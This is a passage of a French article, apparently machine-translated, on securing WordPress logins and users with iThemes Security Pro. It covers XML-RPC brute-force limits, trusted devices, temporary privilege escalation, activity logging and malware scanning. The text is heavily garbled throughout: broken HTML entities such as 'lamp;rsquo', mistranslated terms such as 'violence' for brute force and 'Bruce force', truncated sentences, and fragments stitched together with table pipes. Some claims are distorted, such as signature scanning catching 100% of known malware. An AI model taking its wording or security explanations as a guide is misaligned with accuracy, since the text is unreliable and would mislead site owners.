fournissez aux pirates informatiques les éléments dont ils ont besoin pour contrôler votre site. Camp;rsquoest pourquoi devez suivre toutes les dernières vulnérabilités Utilisateurs légitimes. 2. Limitez les tentatives d’authentification externe en demandant qu’il y ait d’autres façons de connecter à WordPress en plus d’utiliser le formulaire de connexion. Avec XML RPC, un attaquant peut effectuer des centaines de tentatives de nom damp;rsquoutilisateur et de mot de passe dans une seule requête HTTP. La méthode damp;rsquoamplification violente permet à un attaquant damp;rsquoutiliser XML RPC pour des milliers de tentatives de nom damp;rsquoutilisateur et de mot de passe dans plusieurs requêtes http. En utilisant wordpress pour ajuster les paramètres d’ithemes Security pro, pouvez bloquer plusieurs tentatives d’authentification par demande XML RPC. Limiter le nombre de tentatives de nom d’utilisateur et de mot de passe à une par demande protégera grandement votre accès à WordPress. | 3. La restriction de lamp;rsquoaccès à la protection contre la violence en ligne concerne la protection contre la violence locale. La protection contre la violence locale ne vérifie que les tentatives damp;rsquoaccès à votre site et interdit les utilisateurs en fonction des règles de blocage spécifiées dans vos paramètres de sécurité. La protection contre la cyberviolence va encore plus loin. Le réseau est une communauté sécurisée damp;rsquothemes avec plus damp;rsquoun million de sites Web. lamp;rsquoIP est trouvée en tentant damp;rsquoaccéder au site Web de la communauté de sécurité damp;rsquoThemes, elle est ajoutée à la liste des voleurs de réseau de Bruce force. Une fois quamp;rsquoune IP est inscrite sur la liste damp;rsquointerdiction de la violence sur Internet, elle est bloquée sur tous les sites du réseau. Par conséquent, si une IP attaque mon site Web et est interdite, elle sera signalée au réseau de violence de sécurité themes. Mon rapport peut aider à désactiver lamp;rsquoIP sur le réseau. J’aime aider à protéger l’accès WordPress des autres en activant simplement la protection réseau sécurisée d’themes. Pour commencer à utiliser la protection de la force réseau, activez la sur la page damp;rsquoaccueil des paramètres de sécurité. | Puis entrez votre adresse E mail, sélectionnez si souhaitez recevoir des mises à jour par e mail, puis cliquez sur le bouton Enregistrer. | |
| Lorsque activez les nouveaux paramètres de périphérique de confiance, les utilisateurs sont informés des périphériques en attente non reconnus dans la barre d’administration WordPress. lamp;rsquoappareil actuel namp;rsquoa pas été ajouté à la liste des appareils de confiance, cliquez sur le lien confirmer cet appareil pour envoyer un courriel damp;rsquoautorisation. | Cliquez sur le bouton confirmer lamp;rsquoappareil dans un courriel de connexion non reconnu pour ajouter lamp;rsquoappareil actuel à la liste des appareils de confiance. | L’accessibilité de la page d’atterrissage WordPress en fait la partie la plus vulnérable et potentiellement vulnérable de tout site WordPress. Cependant, l’utilisation des étapes de cette section rendra votre accès WordPress presque impénétrable. S Exécuter sur notre site Web. La bonne nouvelle, c’est que la plupart des attaques contre les comptes utilisateurs de WordPress peuvent être évitées avec un peu d’effort de votre part. Voyons ce que pouvez faire pour protéger vos utilisateurs de WordPress. En effet, ces méthodes de sécurité WordPress aideront à protéger n’importe quel type d’utilisateur WordPress. Cependant, lorsque nous examinons chaque méthode, nous faisons savoir quels utilisateurs devraient être nécessaires pour lamp;rsquoutiliser. 1. La façon la plus simple de protéger le site Web en ne fournissant aux utilisateurs que les fonctions dont ils ont besoin est de ne fournir aux utilisateurs que les fonctions dont ils ont besoin et non damp;rsquoautres fonctions. la seule chose que quelquamp;rsquoun fera sur votre site est de créer et damp;rsquoéditer son propre billet de blog, alors namp;rsquoavez pas besoin damp;rsquoéditer le billet de quelquamp;rsquoun damp;rsquoautre. 2. Dans la liste compilée par Splash Data, les utilisateurs de WordPress sont protégés par des mots de passe complexes. Le mot de passe le plus courant dans toutes les décharges de données est 123456. Data dump est une base de données piratée contenant les mots de passe des utilisateurs téléchargés sur Internet. 123456 est le mot de passe le plus courant dans les décharges de données, pouvez imaginer combien de personnes utilisent des mots de passe faibles sur votre site? Utiliser un code faible est comme essayer de fermer la porte avec un morceau de ruban adhésif. Il namp;rsquoa jamais fallu beaucoup de temps aux hackers pour pénétrer brutalement le site en dehors des mots de passe faibles. Aujourdamp;rsquohui, les pirates informatiques utilisent des cartes graphiques pour attaquer, et le temps nécessaire pour déchiffrer le mot de passe namp;rsquoa jamais été réduit. Par exemple, regardons un diagramme créé par terahash, une entreprise de craquage de mot de passe haute performance. Leur graphique montre le temps nécessaire pour déchiffrer le mot de passe en utilisant le cluster 448x RTX 2080 Hash stack. | Par défaut, WordPress utilise le hachage MD5 pour stocker les mots de passe de l’utilisateur dans la base de données O chaque fois que visitez le site, une session WordPress génère un cookie de session. Supposons que votre extension de navigateur a été abandonnée par un développeur et que ne Publiez plus de mises à jour de sécurité. Malheureusement, les extensions de navigateur négligées ont une vulnérabilité. Cette vulnérabilité permet à un attaquant de détourner des cookies de navigateur, y compris les cookies de session WordPress mentionnés ci dessus. Ce type de hacker est appelé détournement de session. Ainsi, un attaquant peut exploiter une vulnérabilité étendue pour monter votre connexion et commencer à apporter des modifications malveillantes à vos utilisateurs WordPress. Vous devriez fournir une protection contre les détournements de session aux administrateurs et aux éditeurs. La fonctionnalité des appareils de confiance dans themes Security pro fait du détournement de session un passé. lamp;rsquoappareil de lamp;rsquoutilisateur change pendant la session, Themes Security déconnecte automatiquement lamp;rsquoutilisateur afin damp;empêcher toute activité non autorisée sur le compte de lamp;rsquoutilisateur, comme changer lamp;rsquoadresse e mail de lamp;rsquoutilisateur ou un plug in malveillant. 6. Chaque fois que créez un nouvel utilisateur, créez un utilisateur de soutien général et ajoutez un autre point damp;rsquoentrée disponible pour les pirates informatiques. Cependant, parfois, votre site Web peut avoir besoin damp;rsquoaide extérieure, par exemple après avoir demandé du soutien ou engagé un entrepreneur indépendant. Vous avez besoin damp;rsquoun moyen sûr damp;rsquoajouter un accès administratif temporaire à votre site Web. Par exemple, supposons quamp;rsquoil y ait un problème avec un plug in installé sur votre site Web. Après avoir communiqué avec le personnel de soutien, il doit accéder à votre site Web en tant quamp;rsquoadministrateur afin quamp;rsquoil puisse le consulter attentivement. Cela semble être une demande très raisonnable et avez décidé de leur accorder lamp;rsquoaccès. Alors Vous permet de supprimer un utilisateur lorsquamp;rsquoil namp;rsquoa plus besoin damp;rsquoaccéder à votre site. La meilleure pratique pour WordPress Security est de supprimer tous les utilisateurs inutilisés de votre site. Quamp;rsquoest ce quamp;rsquoune mise à jour des permissions? La fonctionnalité damp;rsquoamélioration des privilèges damp;rsquoithemes Security pro permet damp;rsquoaccorder temporairement des fonctionnalités supplémentaires aux utilisateurs. La mise à jour des permissions facilite et sécurise la création damp;rsquoutilisateurs génériques que pouvez mettre à la disposition de tout développeur externe ou technicien de soutien qui a besoin damp;rsquoun accès temporaire à votre site Web. La mise à jour des permissions permet de créer un nouvel utilisateur, de lamp;rsquoappeler support et de lamp;rsquoassigner au rôle damp;rsquoutilisateur de lamp;rsquoabonné. La prochaine fois que aurez besoin damp;rsquoun accès temporaire au site, pouvez déplacer les utilisateurs de soutien de lamp;rsquoabonné à lamp;rsquoAdministrateur. Nous verrons comment le faire dans les prochains messages, Mais commençons par expliquer pourquoi lamp;rsquoamélioration des permissions est un meilleur moyen damp;rsquoaccorder lamp;rsquoaccès à votre site. Pourquoi les permissions de mise à niveau sont elles meilleures? mple: namp;rsquoavez pas à créer un nouvel utilisateur chaque fois que accordez lamp;rsquoaccès au site. Automatique: lamp;rsquoaugmentation des permissions ne dure que 24 heures. Après 24 heures, lamp;rsquoutilisateur perd automatiquement toutes les autres permissions. Vous namp;rsquoavez pas besoin de souvenir de supprimer un utilisateur ou de changer un mot de passe. Sans sacrifier la sécurité: Vous pouvez toujours demander à cet utilisateur de support universel de connecter en utilisant la méthode de courriel à deux facteurs, ce qui signifie que avez le même niveau de sécurité que les autres utilisateurs administratifs. Étant donné que le rôle réel de lamp;rsquoutilisateur est celui damp;rsquoun abonné, il namp;rsquoy a aucun risque réel de le laisser sur le site. Comment utiliser la mise à jour des permissions dans themes Security pro pour commencer, activez la mise à jour des permissions sur la page principale des paramètres de sécurité. |
| Le premier type damp;rsquoactivité damp;rsquoutilisateur enregistré est lamp;rsquoheure et le lieu où lamp;rsquoutilisateur se connecte et se déconnecte de votre site Web. Le suivi de lamp;rsquoheure et de lamp;emplacement de lamp;rsquoaccès de lamp;rsquoutilisateur peut aider à identifier les utilisateurs endommagés. Lamp;rsquoutilisateur se connecte t il à des heures anormales ou à partir damp;rsquoun nouvel emplacement? camp;rsquoest le cas, voudrez peut être commencer à enquêter sur eux. 2. Création inscription de lamp;rsquoutilisateur | Prochaine activité pour le cuivre Vous devriez lamp;rsquoexécuter parce quamp;rsquoun tel balayage est généralement le moins précis. Détection de signature et de comportement détection de logiciels malveillants la plupart des logiciels malveillants Scan et antivirus utilisent des signatures de logiciels malveillants pour détecter les logiciels malveillants. La numérisation de logiciels malveillants à la fine pointe de la technologie combinera la détection de signature et lamp;rsquoanalyse comportementale. | gnature du logiciel malveillant une signature du logiciel malveillant est une série damp;rsquooctets utilisés pour identifier un fragment de logiciel malveillant connu. Certains scanners de logiciels malveillants sont pilotés par une base de données contenant des signatures de logiciels malveillants de millions de virus connus. La numérisation des logiciels malveillants basée sur les signatures est rapide et simple et détectera 100% des logiciels malveillants connus et bien connus. Tout cela est génial pour capturer les logiciels malveillants ajoutés par les hackers de bas niveau. Cependant, les hackers expérimentés savent que le scanner de logiciels malveillants vérifie les signatures de logiciels malveillants connus. Ces hackers ont la capacité de brouiller les signatures des logiciels malveillants afin quamp;rsquoils ne puissent pas être détectés par un scanner normal. La vitesse de publication des nouveaux logiciels malveillants empêche le scanner de logiciels malveillants de tenir sa base de données à jour avec toutes les signatures les plus récentes. Par conséquent, les scanners basés sur la signature ne seront pas en mesure de distinguer les nouveaux logiciels malveillants des fichiers README. Txt du plug in. Analyse du comportement lamp;rsquoanalyse du comportement surveille le fonctionnement du logiciel pour déterminer samp;rsquoil est nuisible. De nombreux types de comportement peuvent être considérés comme suspects ou nuisibles. Par exemple, lamp;rsquoAPI de navigation sécurisée de Google est utilisée pour protéger les sites Web de la numérisation du site themes Security pro. Google Security browse vérifie si le logiciel redirige le trafic vers des sites Web malveillants connus. De même, il namp;rsquoexiste aucun moyen fiable de détecter les logiciels malveillants. Mais la combinaison du contrôle du comportement et de la signature augmentera considérablement vos chances damp;rsquoêtre averti Lamp;rsquoinquiétude. Ithemes Security pro ne crée pas de notification damp;rsquoédition de fichier pour les changements quamp;rsquoil peut vérifier. Mise à jour du plug in thème par le gestionnaire de version la fonctionnalité du gestionnaire de version dans themes Security pro permet de mettre à jour automatiquement WordPress, les plug ins et les thèmes. | le gestionnaire de version termine la mise à jour, Themes Security pro connaît la source de la mise à jour et ne déclenche pas damp;rsquoalerte. 2. Comparaison de fichiers entre le plug in Themes et le thème sélectionnez la case à cocher « comparaison de fichiers en ligne » dans les paramètres de détection des changements de fichiers pour activer la comparaison de fichiers en ligne. |